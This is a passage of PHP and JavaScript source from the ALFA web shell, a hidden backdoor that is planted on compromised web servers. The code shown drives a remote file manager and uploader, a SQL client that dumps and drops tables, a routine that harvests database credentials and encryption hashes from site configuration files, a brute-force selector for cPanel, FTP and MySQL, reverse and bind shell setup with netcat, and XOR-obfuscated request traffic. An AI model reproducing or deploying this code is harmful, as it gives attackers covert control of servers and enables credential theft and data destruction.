1273var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';
1274var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';
1275var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';
1276var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';
1277var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';
1278var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';
1279var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';
1280var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';
1281var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';
1282var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';
1283var d = document;
1284var mysql_cache = {};
1285var editor_files = {};
1286var editor_error = true;
1287var editor_current_file = '';
1288var is_minimized = false;
1289var cgi_is_minimized = false;
1290var cgi_lang = '';
1291var upcount = 1;
1292var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
1293var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";
1294function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
1295if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
1296if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;";
1297for($j=1;$j<=10;$j++){
1298echo 'if(alfa'.$j.'!=null)d.mf.alfa'.$j.'.value=alfa'.$j.';else d.mf.alfa'.$j.'.value=alfa'.$j.'_;';
1299}
1300echo "
1301if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
1302}";
1303echo 'function fc(a){alfaloader("block");var b="a="+alfab64("FilesMan")+"&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax="+alfab64("true")+"&",c="";for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");_Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";islinux&&(b="<a class=\"header_pwd\" onclick=\"g(\'FilesMan\',\'/\');\" href=\'javascript:void(0);\'>/</a>",c="/");var e=a.split("/"),f="",g="";"-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));for(i in e)""!=e[i]&&(f+="<a onclick=\"g(\'FilesMan\',\'"+g+e[i]+"/\');\" href=\'javascript:void(0);\' class=\"header_pwd\">"+e[i]+"/</a>",g+=e[i]+"/");$("header_cwd").innerHTML=b+f+" ";var e=c+e.join("/");e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a="+alfab64("FilesMan")+"&c="+a.c.value+"&ajax="+alfab64("true")),c.style.display="none",a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";upcount;){var f=$("pfooterup_"+upcount);f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none"),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="'.__showicon('loader').'"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfaloader(a){$("a_loader").style.display=a}function fsu(a){alfaloader("block");for(var b={},c=0;c<a.elements.length;c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");var obj={},id=$("dumpfile");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");"bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong> Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";}else{$("backdoor_textarea").style.display="none";}}
1304function saveByKey(event){
1305 if(!(String.fromCharCode(event.which).toLowerCase() == \'s\' && event.ctrlKey) && !(event.which == 19))return true;
1306 $("editor_edit_area").onsubmit();
1307 event.preventDefault();
1308 return false;
1309}
1310function setCookie(cname, cvalue, exdays){
1311 var d = new Date();
1312 d.setTime(d.getTime() + (exdays*24*60*60*1000));
1313 var expires = "expires="+ d.toUTCString();
1314 document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
1315}
1316function getCookie(name){
1317 var value = "; " + document.cookie;
1318 var parts = value.split("; " + name + "=");
1319 if (parts.length == 2) return parts.pop().split(";").shift();
1320}
1321function editorClose(pos){
1322 d.body.style.overflow = "visible";
1323 elem = $(pos);
1324 elem.setAttribute("class", "editor-anim-close");
1325 if(pos == "editor"){
1326 is_minimized = false;
1327 }else{
1328 cgi_is_minimized = false;
1329 }
1330 setTimeout(function(){
1331 elem.removeAttribute("class");
1332 elem.style.display = "none";
1333 }, 1000);
1334 d.body.style.overflow = "visible";
1335}
1336function showEditor(pos){
1337 $(pos).setAttribute("class", "editor-anim-show");
1338 $(pos+"-minimized").setAttribute("class", "minimized-hide");
1339 if(pos == "editor"){
1340 is_minimized = false;
1341 if(cgi_is_minimized){
1342 $("cgiloader-minimized").style.top = "30%";
1343 }
1344 }else{
1345 cgi_is_minimized = false;
1346 if(is_minimized){
1347 $("editor-minimized").style.top = "30%";
1348 }
1349 }
1350 d.body.style.overflow = "hidden";
1351}
1352function editorMinimize(pos){
1353 $(pos).setAttribute("class", "editor-anim-minimize");
1354 $(pos+"-minimized").setAttribute("class", "minimized-show");
1355 if(pos == "editor"){
1356 is_minimized = true;
1357 if(cgi_is_minimized){
1358 $("cgiloader-minimized").style.top = "20%";
1359 $("editor-minimized").style.top = "50%";
1360 }else{
1361 $("editor-minimized").style.top = "30%";
1362 }
1363 }else{
1364 cgi_is_minimized = true;
1365 if(is_minimized){
1366 $("cgiloader-minimized").style.top = "20%";
1367 $("editor-minimized").style.top = "50%";
1368 }else{
1369 $("cgiloader-minimized").style.top = "30%";
1370 }
1371 }
1372 d.body.style.overflow = "visible";
1373}
1374function clearEditorHistory(){
1375 var check = confirm("Are u Sure?");
1376 if(check){
1377 for(var i in editor_files){
1378 if(i != editor_current_file){
1379 removeHistory(i);
1380 }
1381 }
1382 }
1383}
1384function editor(file, mode, arg, pwd, file_id, type){
1385 if(type=="dir"&&file=="..")return false;
1386 if(mode == "download"){
1387 g("FilesTools",pwd,file,"download");
1388 return false;
1389 }
1390 var param = "", fid = "", pure_fid = "", cwd = d.mf.c.value, can_append = true;
1391 file = file.trim();
1392 if(Object.keys(editor_files).length == 0){
1393 var cookie_file = getCookie("alfa_history_files");
1394 try{
1395 editor_files = JSON.parse(cookie_file);
1396 for(var t in editor_files){
1397 insertToHistory(t, editor_files[t].file, 0, editor_files[t].type);
1398 }
1399 }catch(e){}
1400 }
1401 if(file.indexOf("/") != -1){
1402 var file_split = file.split("/");
1403 file = file_split[file_split.length - 1];
1404 delete file_split[file_split.length - 1];
1405 cwd = file_split.join("/");
1406 if(islinux){
1407 cwd = "/"+cwd;
1408 }
1409 }
1410 if(typeof type == "undefined"){
1411 type = "";
1412 }
1413 if(typeof pwd != "undefined" && pwd != null && pwd.length != 0){
1414 cwd = pwd.trim();
1415 }
1416 try{
1417 for(var i in editor_files){
1418 if(editor_files[i].file == decodeURIComponent(file) && editor_files[i].pwd.replace(/\//g,"") == cwd.replace(/\//g,"")){
1419 can_append = false;
1420 file_id = i;
1421 break;
1422 }
1423 }
1424 }catch(e){
1425 console.log(e);
1426 }
1427 editor_error = true;
1428 if(typeof arg != "undefined" && arg.length != 0 && arg != null){
1429 param = alfab64(arg);
1430 }
1431 if(typeof file_id != "undefined" && file_id != null && file_id.length != 0){
1432 fid = alfab64(file_id);
1433 pure_fid = file_id;
1434 }else{
1435 var rand_fid = "file_" + getRandom(10);
1436 fid = alfab64(rand_fid);
1437 pure_fid = rand_fid;
1438 }
1439 alfaloader("block");
1440 _Ajax(d.URL, "a="+alfab64("FilesTools")+"&c="+alfab64(cwd)+"&alfa1="+alfab64(file)+"&alfa2="+alfab64(mode)+"&alfa3="+param+"&alfa4="+fid+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"), function(e){
1441 document.querySelector(".editor-content").innerHTML = e;
1442 $("editor").style.display = "block";
1443 alfaloader("none");
1444 evalJS(e);
1445 if(mode != "delete" && editor_error){
1446 var active = d.getElementsByClassName("is_active");
1447 if(active.length != 0){
1448 active[0].className = "file-holder";
1449 }
1450 fid = pure_fid;
1451 file = decodeURIComponent(file);
1452
1453 if(!editor_files[fid] && can_append){
1454 editor_files[fid] = {"file": file, "pwd": cwd, "type": type};
1455 insertToHistory(fid, file, " is_active", type);
1456 if(mode=="mkfile"){
1457 g("FilesMan",null);
1458 }
1459 }else{
1460 $(fid).parentNode.className += " is_active";
1461 }
1462 }
1463 d.body.style.overflow = "hidden";
1464 d.getElementsByClassName("filestools")[0].setAttribute("fid", fid);
1465 if(editor_files[fid]){
1466 d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
1467 }
1468 editor_current_file = fid;
1469 if(is_minimized){
1470 showEditor("editor");
1471 }
1472 updateCookieEditor();
1473 });
1474 return false;
1475}
1476function insertToHistory(fid, file, mode, type){
1477 var active = "";
1478 if(mode && mode != 0){
1479 active = mode;
1480 }
1481 var NewElement = document.createElement("div");
1482 NewElement.innerHTML = "<div id=\'"+fid+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(file,type,fid)+"</div><div class=\'editor-file-name\'>"+file+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\""+fid+"\");\'>X</div>";
1483 NewElement.className = "file-holder" + active;
1484 NewElement.addEventListener("mouseover", function(){setEditorTitle(fid,"over");this.childNodes[1].style.opacity = "1";});
1485 NewElement.addEventListener("mouseout", function(){setEditorTitle(fid,"out");this.childNodes[1].style.opacity = "0";});
1486 var refNode = d.getElementsByClassName("history-list")[0];
1487 refNode.insertBefore(NewElement, refNode.firstChild);
1488}
1489function loadType(file,type,id){
1490 if(type == "none"){
1491 _Ajax(d.URL, "a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[id].pwd)+"&arg="+alfab64(editor_files[id].file), function(e){
1492 $(id).innerHTML = "<div class=\'editor-icon\'>"+loadType(editor_files[id].file,e,id)+"</div><div class=\'editor-file-name\'>"+editor_files[id].file+"</div>";
1493 editor_files[id].type = e;
1494 });
1495 }
1496 var img = \'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\';
1497 if(type == "file"){
1498 type = file.split(".");
1499 type = type[type.length - 1].toLowerCase();
1500 var types = ["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"];
1501 if(types.indexOf(type) == -1){
1502 type = "notfound";
1503 }
1504 }else{
1505 type = "folder";
1506 }
1507 return img.replace("{type}", type + ".png");
1508}
1509function updateDirsEditor(fid, fname){
1510 var current_path = d.mf.c.value + "/";
1511 var oldpath = editor_files[fid].pwd + "/" + fname + "/";
1512 var newpath = editor_files[fid].pwd + "/" + editor_files[fid].file + "/";
1513 oldpath = oldpath.replace(/\/\//g, "/");
1514 newpath = newpath.replace(/\/\//g, "/");
1515 current_path = current_path.replace(/\/\//g, "/");
1516 if(current_path.search(oldpath) != -1){
1517 initDir(current_path.replace(oldpath, newpath));
1518 d.mf.c.value = current_path.replace(oldpath, newpath);
1519 _Ajax(d.URL,"a="+alfab64("updatepath")+"&path="+alfab64(d.mf.c.value),function(e){console.log(e)});
1520 }
1521 for(var i in editor_files){
1522 var path = editor_files[i].pwd + "/";
1523 path = path.replace(/\/\//g, "/");
1524 if(path.search(oldpath) != -1){
1525 editor_files[i].pwd = path.replace(oldpath, newpath);
1526 }
1527 }
1528 var reg1 = new RegExp("\'"+oldpath.slice(0, -1)+"\'");
1529 var reg2 = new RegExp(fname + " \\\|</b></a>");
1530 d.files.innerHTML = d.files.innerHTML.replace(reg1, "\'"+newpath.slice(0, -1)+"\'");
1531 d.files.innerHTML = d.files.innerHTML.replace(reg2, editor_files[fid].file+" |</b></a>");
1532 updateCookieEditor();
1533}
1534function updateCookieEditor(){
1535 setCookie("alfa_history_files", JSON.stringify(editor_files), 2012);
1536}
1537function setEditorTitle(fid, mode){
1538 if(mode == "out" && editor_current_file != ""){
1539 fid = editor_current_file;
1540 }
1541 if(editor_files[fid]){
1542 d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
1543 }
1544}
1545function removeHistory(el){
1546 delete editor_files[el];
1547 if($(el)){
1548 $(el).parentNode.parentNode.removeChild($(el).parentNode);
1549 }
1550 var elm = d.getElementsByClassName("filestools")[0];
1551 if(elm){
1552 if(elm.getAttribute("fid") == el){
1553 elm.outerHTML = "";
1554 }
1555 }
1556 if(editor_current_file == el){
1557 editor_current_file = "";
1558 }
1559 updateCookieEditor();
1560}
1561function getRandom(e){
1562 for(var i = "undefined" == typeof e ? 20 : e, t = "", s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", n = i; n > 0; --n) t += s[Math.floor(Math.random() * s.length)];
1563 return t
1564}
1565function reopen(el){
1566 var file_id = el.getAttribute("id")
1567 var pwd = editor_files[file_id].pwd;
1568 var filename = editor_files[file_id].file;
1569 editor(filename, "auto", "", pwd, file_id);
1570}
1571function copyToClipboard(el){
1572 var node = document.getElementById(el);
1573 if(document.selection){
1574 var range = document.body.createTextRange();
1575 range.moveToElementText(document.getElementById(el));
1576 range.select();
1577 document.execCommand("Copy");
1578 alert("text copied");
1579 }else if (window.getSelection()){
1580 var range = document.createRange();
1581 range.selectNode(document.getElementById(el));
1582 window.getSelection().removeAllRanges();
1583 window.getSelection().addRange(range);
1584 document.execCommand("copy");
1585 alert("text copied");
1586 }
1587}
1588function encrypt(str, pwd) {
1589 if (pwd == null || pwd.length <= 0) {
1590 return null;
1591 }
1592 str = alfab64(str, true);
1593 pwd = alfab64(pwd, true);
1594 var enc_chr = "";
1595 var enc_str = "";
1596 var i = 0;
1597 while (i < str.length) {
1598 for (var j = 0; j < pwd.length; j++) {
1599 enc_chr = str.charCodeAt(i) ^ pwd.charCodeAt(j);
1600 enc_str += String.fromCharCode(enc_chr);
1601 i++;
1602 if (i >= str.length) break;
1603 }
1604 }
1605 return alfab64(enc_str, true);
1606}
1607function reloadSetting(e){
1608alfaloader("block");
1609_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},true);
1610if(e.e.value==0&&e.protect.value==1)setTimeout("location.reload()",1000);
1611if(e.s.value!=e.icon.value)setTimeout("location.reload()",1000);
1612return false
1613}
1614function reloadColors(config){
1615 var obj = {};
1616 if(typeof config == "undefined"){
1617 d.querySelectorAll(".colors_input").forEach(function(e){
1618 var id = e.getAttribute("target").replace(".", "");
1619 obj[id] = e.value;
1620 });
1621 }else{
1622 obj = config;
1623 }
1624 alfaloader("block");
1625 var checdk = ($("use_default_color").checked?"1":"0");
1626 _Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(obj))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(checdk)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){alfaloader("none");evalJS(e);},true);
1627}
1628function alfab64(a, normal){
1629 if(typeof normal != "undefined" || post_encryption_mode == false){
1630 return window.btoa(unescape(encodeURIComponent(a)));
1631 }
1632 return encrypt(a, "'._AlfaSecretKey().'");
1633}
1634function evalCss(jcss){
1635 var style = document.createElement("style");
1636 if (style.styleSheet) {
1637 style.styleSheet.cssText = jcss;
1638 } else {
1639 style.appendChild(document.createTextNode(jcss));
1640 }
1641 d.getElementsByTagName("head")[0].appendChild(style);
1642}
1643function colorHandlerKey(el){
1644 setTimeout(function(e){
1645 colorHandler(el);
1646 }, 200);
1647}
1648function colorHandler(el){
1649 var target = el.getAttribute("target");
1650 var multi = el.getAttribute("multi");
1651 var ishover = target.indexOf(":hover");
1652 if(multi){
1653 var array = JSON.parse(atob(multi));
1654 var jcss = "";
1655 for(i in array.multi_selector){
1656 jcss += i + "{"+array.multi_selector[i].replace(/{color}/g, el.value)+"}";
1657 }
1658 evalCss(jcss);
1659 }
1660 if(ishover != -1 && !multi){
1661 $("input_" + target.replace(".","")).value = el.value;
1662 $("gui_" + target.replace(".","")).value = el.value;
1663 var css = target+"{color: "+el.value+";}";
1664 evalCss(css);
1665 }else{
1666 $("input_" + target.replace(".","")).value = el.value;
1667 $("gui_" + target.replace(".","")).value = el.value;
1668 if(target == ".header_values"){
1669 target = ".header,.header_values";
1670 }
1671 d.querySelectorAll(target).forEach(function(e){
1672 e.style.color = el.value;
1673 });
1674 }
1675}
1676function importConfig(event){
1677 var input = event.target;
1678 var reader = new FileReader();
1679 reader.onload = function(){
1680 var data = reader.result;
1681 try{
1682 var conf = JSON.parse(data);
1683 reloadColors(conf);
1684 }catch(e){
1685 alert("Config is invalid...!");
1686 }
1687 $("importFileBtn").value = "";
1688 };
1689 reader.readAsText(input.files[0]);
1690}
1691function checkBox(){for(i=0;i<d.files.elements.length;i++){if(d.files.elements[i].type == "checkbox"){d.files.elements[i].checked = d.files.elements[0].checked;}}}
1692function path_history(pos){
1693 _Ajax(d.URL,"a="+alfab64("GetPathHistory")+"&ajax="+alfab64("true"),function(e){g("FilesMan", e);},true);
1694}
1695function runcgi(lang){
1696 if(cgi_is_minimized && cgi_lang == lang){
1697 showEditor("cgiloader");
1698 return false;
1699 }
1700 _Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(lang)+"&ajax="+alfab64("true"),function(e){
1701 d.body.style.overflow = "hidden";
1702 $("cgiloader").style.display = "block";
1703 $("cgiframe").innerHTML = e;
1704 cgi_lang = lang;
1705 if(cgi_is_minimized){
1706 $("cgiloader-minimized").setAttribute("class", "minimized-hide");
1707 setTimeout(function(){
1708 $("cgiloader").removeAttribute("class");
1709 if(is_minimized){
1710 $("editor-minimized").style.top = "30%";
1711 }
1712 }, 1000);
1713 }
1714 });
1715}
1716';
1717echo "</script>
1718<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
1719<input type='hidden' name='a' value='dlfile'>
1720<input type='hidden' name='c' value=''>
1721<input type='hidden' name='file' value=''>
1722</form>
1723<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
1724<img id='a_loader' src='".__showicon('loader')."'>";
1725$cmd_uname = alfaEx("uname -a",false,false);
1726$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
1727if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
1728echo '
1729</head>
1730<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
1731<div id="up_bar"></div>
1732<div class="whole">
1733<form method="post" name="mf" style="display:none;">
1734<input type="hidden" name="a">
1735<input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
1736for($s=1;$s<=10;$s++){
1737echo '<input type="hidden" name="alfa'.$s.'">';
1738}
1739echo '<input type="hidden" name="charset">
1740</form>
1741<div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell<br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
1742<div class="header"><table width="100%" border="0">
1743<tr>
1744<td width="3%"><span class="header_vars">Uname:</span></td>
1745<td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
1746</tr>
1747<tr>
1748<td><span class="header_vars">User:</span></td>
1749<td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
1750<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="" src="http://solevisible.com/images/alfa-iran.png" /></td>
1751</tr>
1752<tr>
1753<td><span class="header_vars">PHP:</span></td>
1754<td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
1755</tr>
1756<tr>
1757<td><span class="header_vars">ServerIP:</span></td>
1758<td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).' <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b></td>
1759</tr>
1760<tr>
1761<td width="3%"><span class="header_vars">DateTime:</span></td>
1762<td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
1763</tr>
1764<tr>
1765<td><span class="header_vars">Domains:</span></td>
1766<td width="76%"><span class="header_values" id="header_domains">';
1767if($GLOBALS['sys']=='unix'){
1768$d0mains = _alfa_file("/etc/named.conf",false);
1769if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
1770$count=0;
1771foreach($d0mains as $d0main){
1772if(@strstr($d0main,"zone")){
1773preg_match_all('#zone "(.*)"#', $d0main, $domains);
1774flush();
1775if(strlen(trim($domains[1][0])) > 2){
1776flush();
1777$count++;}}}
1778echo "$count Domains";}}
1779else{echo("Cant Read [ /etc/named.conf ]");}
1780echo '</span></td>
1781</tr>
1782<tr>
1783<td height="16"><span class="header_vars">HDD:</span></td>
